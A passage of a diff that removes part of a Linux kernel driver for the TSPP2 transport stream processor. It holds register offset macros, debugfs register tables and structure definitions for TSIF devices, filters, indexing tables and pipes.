--/* Enable PES No Sync event */
--static int tspp2_en_pes_no_sync;
--module_param(tspp2_en_pes_no_sync, int, S_IRUGO | S_IWUSR);
--
--/**
-- * enum tspp2_operation_opcode - TSPP2 Operation opcode for TSPP2_OPCODE
-- */
--enum tspp2_operation_opcode {
--	TSPP2_OPCODE_PES_ANALYSIS = 0x03,
--	TSPP2_OPCODE_RAW_TRANSMIT = 0x07,
--	TSPP2_OPCODE_PES_TRANSMIT = 0x00,
--	TSPP2_OPCODE_PCR_EXTRACTION = 0x05,
--	TSPP2_OPCODE_CIPHER = 0x01,
--	TSPP2_OPCODE_INDEXING = 0x09,
--	TSPP2_OPCODE_COPY_PACKET = 0x0B,
--	TSPP2_OPCODE_EXIT = 0x0F
--};
--
--/* TSIF Register definitions: */
--#define TSPP2_TSIF_STS_CTL		(0x0000)
--#define TSPP2_TSIF_TIME_LIMIT		(0x0004)
--#define TSPP2_TSIF_CLK_REF		(0x0008)
--#define TSPP2_TSIF_LPBK_FLAGS		(0x000C)
--#define TSPP2_TSIF_LPBK_DATA		(0x0010)
--#define TSPP2_TSIF_DATA_PORT		(0x0100)
--
--/* Bits for TSPP2_TSIF_STS_CTL register */
--#define TSIF_STS_CTL_PKT_WRITE_ERR	BIT(30)
--#define TSIF_STS_CTL_PKT_READ_ERR	BIT(29)
--#define TSIF_STS_CTL_EN_IRQ		BIT(28)
--#define TSIF_STS_CTL_PACK_AVAIL		BIT(27)
--#define TSIF_STS_CTL_1ST_PACKET		BIT(26)
--#define TSIF_STS_CTL_OVERFLOW		BIT(25)
--#define TSIF_STS_CTL_LOST_SYNC		BIT(24)
--#define TSIF_STS_CTL_TIMEOUT		BIT(23)
--#define TSIF_STS_CTL_INV_SYNC		BIT(21)
--#define TSIF_STS_CTL_INV_NULL		BIT(20)
--#define TSIF_STS_CTL_INV_ERROR		BIT(19)
--#define TSIF_STS_CTL_INV_ENABLE		BIT(18)
--#define TSIF_STS_CTL_INV_DATA		BIT(17)
--#define TSIF_STS_CTL_INV_CLOCK		BIT(16)
--#define TSIF_STS_CTL_PARALLEL		BIT(14)
--#define TSIF_STS_CTL_EN_NULL		BIT(11)
--#define TSIF_STS_CTL_EN_ERROR		BIT(10)
--#define TSIF_STS_CTL_LAST_BIT		BIT(9)
--#define TSIF_STS_CTL_EN_TIME_LIM	BIT(8)
--#define TSIF_STS_CTL_EN_TCR		BIT(7)
--#define TSIF_STS_CTL_TEST_MODE		BIT(6)
--#define TSIF_STS_CTL_MODE_2		BIT(5)
--#define TSIF_STS_CTL_EN_DM		BIT(4)
--#define TSIF_STS_CTL_STOP		BIT(3)
--#define TSIF_STS_CTL_START		BIT(0)
--
--/* Indexing Table Register definitions: id = 0..3, n = 0..25 */
--#define TSPP2_INDEX_TABLE_PREFIX(id)		(0x6000 + ((id) << 2))
--#define TSPP2_INDEX_TABLE_PREFIX_MASK(id)	(0x6010 + ((id) << 2))
--#define TSPP2_INDEX_TABLE_PATTEREN(id, n)	(0x3C00 + ((id) << 8) + \
--							((n) << 3))
--#define TSPP2_INDEX_TABLE_MASK(id, n)		(0x3C04 + ((id) << 8) + \
--							((n) << 3))
--#define TSPP2_INDEX_TABLE_PARAMS(id)		(0x6020 + ((id) << 2))
--
--/* Bits for TSPP2_INDEX_TABLE_PARAMS register */
--#define INDEX_TABLE_PARAMS_PREFIX_SIZE_OFFS	8
--#define INDEX_TABLE_PARAMS_NUM_PATTERNS_OFFS	0
--
--/* Source with memory input register definitions: n = 0..7 */
--#define TSPP2_MEM_INPUT_SRC_CONFIG(n)		(0x6040 + ((n) << 2))
--
--/* Bits for TSPP2_MEM_INPUT_SRC_CONFIG register */
--#define MEM_INPUT_SRC_CONFIG_BATCHES_OFFS	16
--#define MEM_INPUT_SRC_CONFIG_INPUT_PIPE_OFFS	8
--#define MEM_INPUT_SRC_CONFIG_16_BATCHES_OFFS	4
--#define MEM_INPUT_SRC_CONFIG_STAMP_SUFFIX_OFFS	2
--#define MEM_INPUT_SRC_CONFIG_STAMP_EN_OFFS	1
--#define MEM_INPUT_SRC_CONFIG_INPUT_EN_OFFS	0
--
--/* Source with TSIF input register definitions: n = 0..1 */
--#define TSPP2_TSIF_INPUT_SRC_CONFIG(n)		(0x6060 + ((n) << 2))
--#define TSIF_INPUT_SRC_CONFIG_16_BATCHES_OFFS	4
--
--/* Bits for TSPP2_TSIF_INPUT_SRC_CONFIG register */
--#define TSIF_INPUT_SRC_CONFIG_BATCHES_OFFS	16
--#define TSIF_INPUT_SRC_CONFIG_INPUT_EN_OFFS	0
--
--/* Source with any input register definitions: n = 0..9 */
--#define TSPP2_SRC_DEST_PIPES(n)			(0x6070 + ((n) << 2))
--#define TSPP2_SRC_CONFIG(n)			(0x6120 + ((n) << 2))
--#define TSPP2_SRC_TOTAL_TSP(n)			(0x6600 + ((n) << 2))
--#define TSPP2_SRC_FILTERED_OUT_TSP(n)		(0x6630 + ((n) << 2))
--
--/* Bits for TSPP2_SRC_CONFIG register */
--#define SRC_CONFIG_SYNC_BYTE_OFFS		24
--#define SRC_CONFIG_CHECK_SYNC_OFFS		23
--#define SRC_CONFIG_SCRAMBLING_MONITOR_OFFS	13
--#define SRC_CONFIG_VERIFY_PES_START_OFFS	12
--#define SRC_CONFIG_SCRAMBLING3_OFFS		10
--#define SRC_CONFIG_SCRAMBLING2_OFFS		8
--#define SRC_CONFIG_SCRAMBLING1_OFFS		6
--#define SRC_CONFIG_SCRAMBLING0_OFFS		4
--#define SRC_CONFIG_DISCARD_INVALID_AF_OFFS	3
--#define SRC_CONFIG_ASSUME_DUPLICATES_OFFS	2
--#define SRC_CONFIG_IGNORE_DISCONT_OFFS		1
--#define SRC_CONFIG_CHECK_CONT_OFFS		0
--
--/* Context register definitions: n = 0..127 */
--#define TSPP2_PES_CONTEXT0(n)		(0x0000 + ((n) << 4))
--#define TSPP2_PES_CONTEXT1(n)		(0x0004 + ((n) << 4))
--#define TSPP2_PES_CONTEXT2(n)		(0x0008 + ((n) << 4))
--#define TSPP2_PES_CONTEXT3(n)		(0x000C + ((n) << 4))
--#define TSPP2_INDEXING_CONTEXT0(n)	(0x0800 + ((n) << 3))
--#define TSPP2_INDEXING_CONTEXT1(n)	(0x0804 + ((n) << 3))
--#define TSPP2_TSP_CONTEXT(n)		(0x5600 + ((n) << 2))
--
--/* Bits for TSPP2_TSP_CONTEXT register */
--#define TSP_CONTEXT_TS_HEADER_SC_OFFS	6
--#define TSP_CONTEXT_PES_HEADER_SC_OFFS	8
--
--/* Operations register definitions: f_idx = 0..127, n = 0..15 */
--#define TSPP2_OPCODE(f_idx, n)	(0x1000 + \
--				((f_idx) * (TSPP2_MAX_OPS_PER_FILTER << 2)) + \
--				((n) << 2))
--
--/* Filter register definitions: n = 0..127 */
--#define TSPP2_FILTER_ENTRY0(n)		(0x5800 + ((n) << 3))
--#define TSPP2_FILTER_ENTRY1(n)		(0x5804 + ((n) << 3))
--
--/* Bits for TSPP2_FILTER_ENTRY0 register */
--#define FILTER_ENTRY0_PID_OFFS		0
--#define FILTER_ENTRY0_MASK_OFFS		13
--#define FILTER_ENTRY0_EN_OFFS		26
--#define FILTER_ENTRY0_CODEC_OFFS	27
--
--/* Bits for TSPP2_FILTER_ENTRY1 register */
--#define FILTER_ENTRY1_CONTEXT_OFFS	0
--
--/* Filter context-based counter register definitions: n = 0..127 */
--#define TSPP2_FILTER_TSP_SYNC_ERROR(n)		(0x4000 + ((n) << 2))
--#define TSPP2_FILTER_ERRED_TSP(n)		(0x4200 + ((n) << 2))
--#define TSPP2_FILTER_DISCONTINUITIES(n)		(0x4400 + ((n) << 2))
--#define TSPP2_FILTER_SCRAMBLING_BITS_DISCARD(n)	(0x4600 + ((n) << 2))
--#define TSPP2_FILTER_TSP_TOTAL_NUM(n)		(0x4800 + ((n) << 2))
--#define TSPP2_FILTER_DISCONT_INDICATOR(n)	(0x4A00 + ((n) << 2))
--#define TSPP2_FILTER_TSP_NO_PAYLOAD(n)		(0x4C00 + ((n) << 2))
--#define TSPP2_FILTER_TSP_DUPLICATE(n)		(0x4E00 + ((n) << 2))
--#define TSPP2_FILTER_KEY_FETCH_FAILURE(n)	(0x5000 + ((n) << 2))
--#define TSPP2_FILTER_DROPPED_PCR(n)		(0x5200 + ((n) << 2))
--#define TSPP2_FILTER_PES_ERRORS(n)		(0x5400 + ((n) << 2))
--
--/* Pipe register definitions: n = 0..30 */
--#define TSPP2_PIPE_THRESH_CONFIG(n)		(0x60A0 + ((n) << 2))
--#define TSPP2_PIPE_LAST_ADDRESS(n)		(0x6190 + ((n) << 2))
--#define TSPP2_PIPE_SECURITY			0x6150
--#define TSPP2_DATA_NOT_SENT_ON_PIPE(n)		(0x6660 + ((n) << 2))
--
--/* Global register definitions: */
--#define TSPP2_PCR_GLOBAL_CONFIG			0x6160
--#define TSPP2_CLK_TO_PCR_TIME_UNIT		0x6170
--#define TSPP2_DESC_WAIT_TIMEOUT			0x6180
--#define TSPP2_GLOBAL_IRQ_STATUS			0x6300
--#define TSPP2_GLOBAL_IRQ_CLEAR			0x6304
--#define TSPP2_GLOBAL_IRQ_ENABLE			0x6308
--#define TSPP2_KEY_NOT_READY_IRQ_STATUS		0x6310
--#define TSPP2_KEY_NOT_READY_IRQ_CLEAR		0x6314
--#define TSPP2_KEY_NOT_READY_IRQ_ENABLE		0x6318
--#define TSPP2_UNEXPECTED_RST_IRQ_STATUS		0x6320
--#define TSPP2_UNEXPECTED_RST_IRQ_CLEAR		0x6324
--#define TSPP2_UNEXPECTED_RST_IRQ_ENABLE		0x6328
--#define TSPP2_WRONG_PIPE_DIR_IRQ_STATUS		0x6330
--#define TSPP2_WRONG_PIPE_DIR_IRQ_CLEAR		0x6334
--#define TSPP2_WRONG_PIPE_DIR_IRQ_ENABLE		0x6338
--#define TSPP2_QSB_RESPONSE_ERROR_IRQ_STATUS	0x6340
--#define TSPP2_QSB_RESPONSE_ERROR_IRQ_CLEAR	0x6344
--#define TSPP2_QSB_RESPONSE_ERROR_IRQ_ENABLE	0x6348
--#define TSPP2_SRC_TOTAL_TSP_RESET		0x6710
--#define TSPP2_SRC_FILTERED_OUT_TSP_RESET	0x6714
--#define TSPP2_DATA_NOT_SENT_ON_PIPE_RESET	0x6718
--#define TSPP2_VERSION				0x6FFC
--
--/* Bits for TSPP2_GLOBAL_IRQ_CLEAR register */
--#define GLOBAL_IRQ_CLEAR_RESERVED_OFFS         4
--
--/* Bits for TSPP2_VERSION register */
--#define VERSION_MAJOR_OFFS			28
--#define VERSION_MINOR_OFFS			16
--#define VERSION_STEP_OFFS			0
--
--/* Bits for TSPP2_GLOBAL_IRQ_XXX registers */
--#define GLOBAL_IRQ_TSP_INVALID_AF_OFFS		0
--#define GLOBAL_IRQ_TSP_INVALID_LEN_OFFS		1
--#define GLOBAL_IRQ_PES_NO_SYNC_OFFS		2
--#define GLOBAL_IRQ_ENCRYPT_LEVEL_ERR_OFFS	3
--#define GLOBAL_IRQ_KEY_NOT_READY_OFFS		4
--#define GLOBAL_IRQ_UNEXPECTED_RESET_OFFS	5
--#define GLOBAL_IRQ_QSB_RESP_ERR_OFFS		6
--#define GLOBAL_IRQ_WRONG_PIPE_DIR_OFFS		7
--#define GLOBAL_IRQ_SC_GO_HIGH_OFFS		8
--#define GLOBAL_IRQ_SC_GO_LOW_OFFS		9
--#define GLOBAL_IRQ_READ_FAIL_OFFS		16
--#define GLOBAL_IRQ_FC_STALL_OFFS		24
--
--/* Bits for TSPP2_PCR_GLOBAL_CONFIG register */
--#define PCR_GLOBAL_CONFIG_PCR_ON_DISCONT_OFFS	10
--#define PCR_GLOBAL_CONFIG_STC_OFFSET_OFFS	8
--#define PCR_GLOBAL_CONFIG_PCR_INTERVAL_OFFS	0
--#define PCR_GLOBAL_CONFIG_PCR_ON_DISCONT	BIT(10)
--#define PCR_GLOBAL_CONFIG_STC_OFFSET		(BIT(8)|BIT(9))
--#define PCR_GLOBAL_CONFIG_PCR_INTERVAL		0xFF
--
--/* n = 0..3, each register handles 32 filters */
--#define TSPP2_SC_GO_HIGH_STATUS(n)		(0x6350 + ((n) << 2))
--#define TSPP2_SC_GO_HIGH_CLEAR(n)		(0x6360 + ((n) << 2))
--#define TSPP2_SC_GO_HIGH_ENABLE(n)		(0x6370 + ((n) << 2))
--#define TSPP2_SC_GO_LOW_STATUS(n)		(0x6390 + ((n) << 2))
--#define TSPP2_SC_GO_LOW_CLEAR(n)		(0x63A0 + ((n) << 2))
--#define TSPP2_SC_GO_LOW_ENABLE(n)		(0x63B0 + ((n) << 2))
--
--/* n = 0..3, each register handles 32 contexts */
--#define TSPP2_TSP_CONTEXT_RESET(n)		(0x6500 + ((n) << 2))
--#define TSPP2_PES_CONTEXT_RESET(n)		(0x6510 + ((n) << 2))
--#define TSPP2_INDEXING_CONTEXT_RESET(n)		(0x6520 + ((n) << 2))
--
--/* debugfs entries */
--
--#define TSPP2_S_RW	(S_IRUGO | S_IWUSR)
--
--struct debugfs_entry {
--	const char *name;
--	mode_t mode;
--	int offset;
--};
--
--static const struct debugfs_entry tsif_regs[] = {
--	{"sts_ctl",	TSPP2_S_RW,	TSPP2_TSIF_STS_CTL},
--	{"time_limit",	TSPP2_S_RW,	TSPP2_TSIF_TIME_LIMIT},
--	{"clk_ref",	TSPP2_S_RW,	TSPP2_TSIF_CLK_REF},
--	{"lpbk_flags",	TSPP2_S_RW,	TSPP2_TSIF_LPBK_FLAGS},
--	{"lpbk_data",	TSPP2_S_RW,	TSPP2_TSIF_LPBK_DATA},
--	{"data_port",	S_IRUGO,	TSPP2_TSIF_DATA_PORT},
--};
--
--static const struct debugfs_entry tspp2_regs[] = {
--	/* Memory input source configuration registers */
--	{"mem_input_src_config_0", TSPP2_S_RW, TSPP2_MEM_INPUT_SRC_CONFIG(0)},
--	{"mem_input_src_config_1", TSPP2_S_RW, TSPP2_MEM_INPUT_SRC_CONFIG(1)},
--	{"mem_input_src_config_2", TSPP2_S_RW, TSPP2_MEM_INPUT_SRC_CONFIG(2)},
--	{"mem_input_src_config_3", TSPP2_S_RW, TSPP2_MEM_INPUT_SRC_CONFIG(3)},
--	{"mem_input_src_config_4", TSPP2_S_RW, TSPP2_MEM_INPUT_SRC_CONFIG(4)},
--	{"mem_input_src_config_5", TSPP2_S_RW, TSPP2_MEM_INPUT_SRC_CONFIG(5)},
--	{"mem_input_src_config_6", TSPP2_S_RW, TSPP2_MEM_INPUT_SRC_CONFIG(6)},
--	{"mem_input_src_config_7", TSPP2_S_RW, TSPP2_MEM_INPUT_SRC_CONFIG(7)},
--	/* TSIF input source configuration registers */
--	{"tsif_input_src_config_0", TSPP2_S_RW, TSPP2_TSIF_INPUT_SRC_CONFIG(0)},
--	{"tsif_input_src_config_1", TSPP2_S_RW, TSPP2_TSIF_INPUT_SRC_CONFIG(1)},
--	/* Source destination pipes association registers */
--	{"src_dest_pipes_0", TSPP2_S_RW, TSPP2_SRC_DEST_PIPES(0)},
--	{"src_dest_pipes_1", TSPP2_S_RW, TSPP2_SRC_DEST_PIPES(1)},
--	{"src_dest_pipes_2", TSPP2_S_RW, TSPP2_SRC_DEST_PIPES(2)},
--	{"src_dest_pipes_3", TSPP2_S_RW, TSPP2_SRC_DEST_PIPES(3)},
--	{"src_dest_pipes_4", TSPP2_S_RW, TSPP2_SRC_DEST_PIPES(4)},
--	{"src_dest_pipes_5", TSPP2_S_RW, TSPP2_SRC_DEST_PIPES(5)},
--	{"src_dest_pipes_6", TSPP2_S_RW, TSPP2_SRC_DEST_PIPES(6)},
--	{"src_dest_pipes_7", TSPP2_S_RW, TSPP2_SRC_DEST_PIPES(7)},
--	{"src_dest_pipes_8", TSPP2_S_RW, TSPP2_SRC_DEST_PIPES(8)},
--	{"src_dest_pipes_9", TSPP2_S_RW, TSPP2_SRC_DEST_PIPES(9)},
--	/* Source configuration registers */
--	{"src_config_0", TSPP2_S_RW, TSPP2_SRC_CONFIG(0)},
--	{"src_config_1", TSPP2_S_RW, TSPP2_SRC_CONFIG(1)},
--	{"src_config_2", TSPP2_S_RW, TSPP2_SRC_CONFIG(2)},
--	{"src_config_3", TSPP2_S_RW, TSPP2_SRC_CONFIG(3)},
--	{"src_config_4", TSPP2_S_RW, TSPP2_SRC_CONFIG(4)},
--	{"src_config_5", TSPP2_S_RW, TSPP2_SRC_CONFIG(5)},
--	{"src_config_6", TSPP2_S_RW, TSPP2_SRC_CONFIG(6)},
--	{"src_config_7", TSPP2_S_RW, TSPP2_SRC_CONFIG(7)},
--	{"src_config_8", TSPP2_S_RW, TSPP2_SRC_CONFIG(8)},
--	{"src_config_9", TSPP2_S_RW, TSPP2_SRC_CONFIG(9)},
--	/* Source total TS packets counter registers */
--	{"src_total_tsp_0", S_IRUGO, TSPP2_SRC_TOTAL_TSP(0)},
--	{"src_total_tsp_1", S_IRUGO, TSPP2_SRC_TOTAL_TSP(1)},
--	{"src_total_tsp_2", S_IRUGO, TSPP2_SRC_TOTAL_TSP(2)},
--	{"src_total_tsp_3", S_IRUGO, TSPP2_SRC_TOTAL_TSP(3)},
--	{"src_total_tsp_4", S_IRUGO, TSPP2_SRC_TOTAL_TSP(4)},
--	{"src_total_tsp_5", S_IRUGO, TSPP2_SRC_TOTAL_TSP(5)},
--	{"src_total_tsp_6", S_IRUGO, TSPP2_SRC_TOTAL_TSP(6)},
--	{"src_total_tsp_7", S_IRUGO, TSPP2_SRC_TOTAL_TSP(7)},
--	{"src_total_tsp_8", S_IRUGO, TSPP2_SRC_TOTAL_TSP(8)},
--	{"src_total_tsp_9", S_IRUGO, TSPP2_SRC_TOTAL_TSP(9)},
--	/* Source total filtered out TS packets counter registers */
--	{"src_filtered_out_tsp_0", S_IRUGO, TSPP2_SRC_FILTERED_OUT_TSP(0)},
--	{"src_filtered_out_tsp_1", S_IRUGO, TSPP2_SRC_FILTERED_OUT_TSP(1)},
--	{"src_filtered_out_tsp_2", S_IRUGO, TSPP2_SRC_FILTERED_OUT_TSP(2)},
--	{"src_filtered_out_tsp_3", S_IRUGO, TSPP2_SRC_FILTERED_OUT_TSP(3)},
--	{"src_filtered_out_tsp_4", S_IRUGO, TSPP2_SRC_FILTERED_OUT_TSP(4)},
--	{"src_filtered_out_tsp_5", S_IRUGO, TSPP2_SRC_FILTERED_OUT_TSP(5)},
--	{"src_filtered_out_tsp_6", S_IRUGO, TSPP2_SRC_FILTERED_OUT_TSP(6)},
--	{"src_filtered_out_tsp_7", S_IRUGO, TSPP2_SRC_FILTERED_OUT_TSP(7)},
--	{"src_filtered_out_tsp_8", S_IRUGO, TSPP2_SRC_FILTERED_OUT_TSP(8)},
--	{"src_filtered_out_tsp_9", S_IRUGO, TSPP2_SRC_FILTERED_OUT_TSP(9)},
--	/* Global registers */
--	{"pipe_security", TSPP2_S_RW, TSPP2_PIPE_SECURITY},
--	{"pcr_global_config", TSPP2_S_RW, TSPP2_PCR_GLOBAL_CONFIG},
--	{"clk_to_pcr_time_unit", TSPP2_S_RW, TSPP2_CLK_TO_PCR_TIME_UNIT},
--	{"desc_wait_timeout", TSPP2_S_RW, TSPP2_DESC_WAIT_TIMEOUT},
--	{"global_irq_status", S_IRUGO, TSPP2_GLOBAL_IRQ_STATUS},
--	{"global_irq_clear", S_IWUSR, TSPP2_GLOBAL_IRQ_CLEAR},
--	{"global_irq_en", TSPP2_S_RW, TSPP2_GLOBAL_IRQ_ENABLE},
--	{"key_not_ready_irq_status", S_IRUGO, TSPP2_KEY_NOT_READY_IRQ_STATUS},
--	{"key_not_ready_irq_clear", S_IWUSR, TSPP2_KEY_NOT_READY_IRQ_CLEAR},
--	{"key_not_ready_irq_en", TSPP2_S_RW, TSPP2_KEY_NOT_READY_IRQ_ENABLE},
--	{"unexpected_rst_irq_status", S_IRUGO, TSPP2_UNEXPECTED_RST_IRQ_STATUS},
--	{"unexpected_rst_irq_clear", S_IWUSR, TSPP2_UNEXPECTED_RST_IRQ_CLEAR},
--	{"unexpected_rst_irq_en", TSPP2_S_RW, TSPP2_UNEXPECTED_RST_IRQ_ENABLE},
--	{"wrong_pipe_dir_irq_status", S_IRUGO, TSPP2_WRONG_PIPE_DIR_IRQ_STATUS},
--	{"wrong_pipe_dir_irq_clear", S_IWUSR, TSPP2_WRONG_PIPE_DIR_IRQ_CLEAR},
--	{"wrong_pipe_dir_irq_en", TSPP2_S_RW, TSPP2_WRONG_PIPE_DIR_IRQ_ENABLE},
--	{"qsb_response_error_irq_status", S_IRUGO,
--					TSPP2_QSB_RESPONSE_ERROR_IRQ_STATUS},
--	{"qsb_response_error_irq_clear", S_IWUSR,
--					TSPP2_QSB_RESPONSE_ERROR_IRQ_CLEAR},
--	{"qsb_response_error_irq_en", TSPP2_S_RW,
--					TSPP2_QSB_RESPONSE_ERROR_IRQ_ENABLE},
--	{"src_total_tsp_reset", S_IWUSR, TSPP2_SRC_TOTAL_TSP_RESET},
--	{"src_filtered_out_tsp_reset", S_IWUSR,
--					TSPP2_SRC_FILTERED_OUT_TSP_RESET},
--	{"data_not_sent_on_pipe_reset", S_IWUSR,
--					TSPP2_DATA_NOT_SENT_ON_PIPE_RESET},
--	{"version", S_IRUGO, TSPP2_VERSION},
--	/* Scrambling bits monitoring interrupt registers */
--	{"sc_go_high_status_0", S_IRUGO, TSPP2_SC_GO_HIGH_STATUS(0)},
--	{"sc_go_high_status_1", S_IRUGO, TSPP2_SC_GO_HIGH_STATUS(1)},
--	{"sc_go_high_status_2", S_IRUGO, TSPP2_SC_GO_HIGH_STATUS(2)},
--	{"sc_go_high_status_3", S_IRUGO, TSPP2_SC_GO_HIGH_STATUS(3)},
--	{"sc_go_high_clear_0", S_IWUSR, TSPP2_SC_GO_HIGH_CLEAR(0)},
--	{"sc_go_high_clear_1", S_IWUSR, TSPP2_SC_GO_HIGH_CLEAR(1)},
--	{"sc_go_high_clear_2", S_IWUSR, TSPP2_SC_GO_HIGH_CLEAR(2)},
--	{"sc_go_high_clear_3", S_IWUSR, TSPP2_SC_GO_HIGH_CLEAR(3)},
--	{"sc_go_high_en_0", TSPP2_S_RW, TSPP2_SC_GO_HIGH_ENABLE(0)},
--	{"sc_go_high_en_1", TSPP2_S_RW, TSPP2_SC_GO_HIGH_ENABLE(1)},
--	{"sc_go_high_en_2", TSPP2_S_RW, TSPP2_SC_GO_HIGH_ENABLE(2)},
--	{"sc_go_high_en_3", TSPP2_S_RW, TSPP2_SC_GO_HIGH_ENABLE(3)},
--	{"sc_go_low_status_0", S_IRUGO, TSPP2_SC_GO_LOW_STATUS(0)},
--	{"sc_go_low_status_1", S_IRUGO, TSPP2_SC_GO_LOW_STATUS(1)},
--	{"sc_go_low_status_2", S_IRUGO, TSPP2_SC_GO_LOW_STATUS(2)},
--	{"sc_go_low_status_3", S_IRUGO, TSPP2_SC_GO_LOW_STATUS(3)},
--	{"sc_go_low_clear_0", S_IWUSR, TSPP2_SC_GO_LOW_CLEAR(0)},
--	{"sc_go_low_clear_1", S_IWUSR, TSPP2_SC_GO_LOW_CLEAR(1)},
--	{"sc_go_low_clear_2", S_IWUSR, TSPP2_SC_GO_LOW_CLEAR(2)},
--	{"sc_go_low_clear_3", S_IWUSR, TSPP2_SC_GO_LOW_CLEAR(3)},
--	{"sc_go_low_en_0", TSPP2_S_RW, TSPP2_SC_GO_LOW_ENABLE(0)},
--	{"sc_go_low_en_1", TSPP2_S_RW, TSPP2_SC_GO_LOW_ENABLE(1)},
--	{"sc_go_low_en_2", TSPP2_S_RW, TSPP2_SC_GO_LOW_ENABLE(2)},
--	{"sc_go_low_en_3", TSPP2_S_RW, TSPP2_SC_GO_LOW_ENABLE(3)},
--};
--
--/* Data structures */
--
--/**
-- * struct tspp2_tsif_device - TSIF device
-- *
-- * @base:		TSIF device memory base address.
-- * @hw_index:		TSIF device HW index (0 .. (TSPP2_NUM_TSIF_INPUTS - 1)).
-- * @dev:		Back pointer to the TSPP2 device.
-- * @time_limit:		TSIF device time limit
-- *			(maximum time allowed between each TS packet).
-- * @ref_count:		TSIF device reference count.
-- * @tsif_irq:		TSIF device IRQ number.
-- * @mode:		TSIF mode of operation.
-- * @clock_inverse:	Invert input clock signal.
-- * @data_inverse:	Invert input data signal.
-- * @sync_inverse:	Invert input sync signal.
-- * @enable_inverse:	Invert input enable signal.
-- * @debugfs_entrys:	TSIF device debugfs entry.
-- * @stat_pkt_write_err:	TSIF device packet write error statistics.
-- * @stat__pkt_read_err: TSIF device packet read error statistics.
-- * @stat_overflow:	TSIF device overflow statistics.
-- * @stat_lost_sync:	TSIF device lost sync statistics.
-- * @stat_timeout:	TSIF device timeout statistics.
-- */
--struct tspp2_tsif_device {
--	void __iomem *base;
--	u32 hw_index;
--	struct tspp2_device *dev;
--	u32 time_limit;
--	u32 ref_count;
--	u32 tsif_irq;
--	enum tspp2_tsif_mode mode;
--	int clock_inverse;
--	int data_inverse;
--	int sync_inverse;
--	int enable_inverse;
--	struct dentry *debugfs_entry;
--	u32 stat_pkt_write_err;
--	u32 stat_pkt_read_err;
--	u32 stat_overflow;
--	u32 stat_lost_sync;
--	u32 stat_timeout;
--};
--
--/**
-- * struct tspp2_indexing_table - Indexing table
-- *
-- * @prefix_value:	4-byte common prefix value.
-- * @prefix_mask:	4-byte prefix mask.
-- * @entry_value:	An array of 4-byte pattern values.
-- * @entry_mask:		An array of corresponding 4-byte pattern masks.
-- * @num_valid_entries:	Number of valid entries in the arrays.
-- */
--struct tspp2_indexing_table {
--	u32 prefix_value;
--	u32 prefix_mask;
--	u32 entry_value[TSPP2_NUM_INDEXING_PATTERNS];
--	u32 entry_mask[TSPP2_NUM_INDEXING_PATTERNS];
--	u16 num_valid_entries;
--};
--
--/**
-- * struct tspp2_event_work - Event work information
-- *
-- * @device:		TSPP2 device back-pointer.
-- * @callback:		Callback to invoke.
-- * @cookie:		Cookie to pass to the callback.
-- * @event_bitmask:	A bit mask of events to pass to the callback.
-- * @work:		The work structure to queue.
-- * @link:		A list element.
-- */
--struct tspp2_event_work {
--	struct tspp2_device *device;
--	void (*callback)(void *cookie, u32 event_bitmask);
--	void *cookie;
--	u32 event_bitmask;
--	struct work_struct work;
--	struct list_head link;
--};
--
--/**
-- * struct tspp2_filter - Filter object
-- *
-- * @opened:			A flag to indicate whether the filter is open.
-- * @device:			Back-pointer to the TSPP2 device the filter
-- *				belongs to.
-- * @batch:			The filter batch this filter belongs to.
-- * @src:			Back-pointer to the source the filter is
-- *				associated with.
-- * @hw_index:			The filter's HW index.
-- * @pid_value:			The filter's 13-bit PID value.
-- * @mask:			The corresponding 13-bit bitmask.
-- * @context:			The filter's context ID.
-- * @indexing_table_id:		The ID of the indexing table this filter uses
-- *				in case an indexing operation is set.
-- * @operations:			An array of user-defined operations.
-- * @num_user_operations:	The number of user-defined operations.
-- * @indexing_op_set:		A flag to indicate an indexing operation
-- *				has been set.
-- * @raw_op_with_indexing:	A flag to indicate a Raw Transmit operation
-- *				with support_indexing parameter has been set.
-- * @pes_analysis_op_set:	A flag to indicate a PES Analysis operation
-- *				has been set.
-- * @raw_op_set:			A flag to indicate a Raw Transmit operation
-- *				has been set.
-- * @pes_tx_op_set:		A flag to indicate a PES Transmit operation
-- *				has been set.
-- * @event_callback:		A user callback to invoke when a filter event
-- *				occurs.
-- * @event_cookie:		A user cookie to provide to the callback.
-- * @event_bitmask:		A bit mask of filter events
-- *				TSPP2_FILTER_EVENT_XXX.
-- * @enabled:			A flag to indicate whether the filter
-- *				is enabled.
-- * @link:			A list element. When the filter is associated
-- *				with a source, it is added to the source's
-- *				list of filters.
-- */
--struct tspp2_filter {
--	int opened;
--	struct tspp2_device *device;
--	struct tspp2_filter_batch *batch;
--	struct tspp2_src *src;
--	u16 hw_index;
--	u16 pid_value;
--	u16 mask;
--	u16 context;
--	u8 indexing_table_id;
--	struct tspp2_operation operations[TSPP2_MAX_OPS_PER_FILTER];
--	u8 num_user_operations;
--	int indexing_op_set;
--	int raw_op_with_indexing;
--	int pes_analysis_op_set;
--	int raw_op_set;
--	int pes_tx_op_set;
--	void (*event_callback)(void *cookie, u32 event_bitmask);
--	void *event_cookie;
--	u32 event_bitmask;
--	int enabled;
--	struct list_head link;
--};
--
--/**
-- * struct tspp2_pipe - Pipe object
-- *
-- * @opened:		A flag to indicate whether the pipe is open.
-- * @device:		Back-pointer to the TSPP2 device the pipe belongs to.
-- * @cfg:		Pipe configuration parameters.
-- * @sps_pipe:		The BAM SPS pipe.
-- * @sps_connect_cfg:	SPS pipe connection configuration.
-- * @sps_event:		SPS pipe event registration parameters.
-- * @desc_ion_handle:	ION handle for the SPS pipe descriptors.
-- * @iova:		TSPP2 IOMMU-mapped virtual address of the
-- *			data buffer provided by the user.
-- * @hw_index:		The pipe's HW index (for register access).
-- * @threshold:		Pipe threshold.
-- * @ref_cnt:		Pipe reference count. Incremented when pipe
-- *			is attached to a source, decremented when it
-- *			is detached from a source.
-- */
--struct tspp2_pipe {
--	int opened;
--	struct tspp2_device *device;
--	struct tspp2_pipe_config_params cfg;
--	struct sps_pipe *sps_pipe;
--	struct sps_connect sps_connect_cfg;
--	struct sps_register_event sps_event;
--	struct ion_handle *desc_ion_handle;
--	ion_phys_addr_t iova;
--	u32 hw_index;
--	u16 threshold;
--	u32 ref_cnt;
--};
--
--/**
-- * struct tspp2_output_pipe - Output pipe element to add to a source's list
-- *
-- * @pipe:	A pointer to an output pipe object.
-- * @link:	A list element. When an output pipe is attached to a source,
-- *		it is added to the source's output pipe list. Note the same pipe
-- *		can be attached to multiple sources, so we allocate an output
-- *		pipe element to add to the list - we don't add the actual pipe.
-- */
--struct tspp2_output_pipe {
--	struct tspp2_pipe *pipe;
--	struct list_head link;
--};
--
--/**
-- * struct tspp2_filter_batch - Filter batch object
